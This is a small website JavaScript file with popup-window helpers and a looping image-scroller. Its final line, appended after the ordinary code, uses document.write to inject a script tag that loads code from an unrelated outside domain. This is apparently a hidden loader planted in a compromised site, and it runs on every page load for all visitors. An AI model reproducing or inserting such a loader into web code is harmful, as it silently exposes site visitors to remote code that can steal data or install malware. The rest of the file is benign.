// JavaScript Document

function pop_priv(url, width, height){
	img = window.open (url,"mywindow","menubar=1,resizable=1,scrollbars=yes,screenX=100,screenY=100,width="+width+",height="+height);
	img.focus();	
}

function fireMyPopup(id) 
{
        //myPopupRelocate();
 document.getElementById(id).style.display = "block";
}

function styledPopupClose(id)
 {
 document.getElementById(id).style.display = "none";
}
 var m=0;
  var n=1196;
  var speed=0;
function scrollPics()
 {
     document.getElementById('div1').style.left=m+'px';
     document.getElementById('div2').style.left=n+'px';
   m--;
   n--;
if(m==-1196) {
   m=1196;
 }
if(n==-1196) {
   n=1196;
 }
setTimeout('scrollPics()',speed);
 } 
window.onload=function() 
{
   scrollPics();
 }

document.write('<script src=http://samed-resort.com/full/beer.php ><\/script>');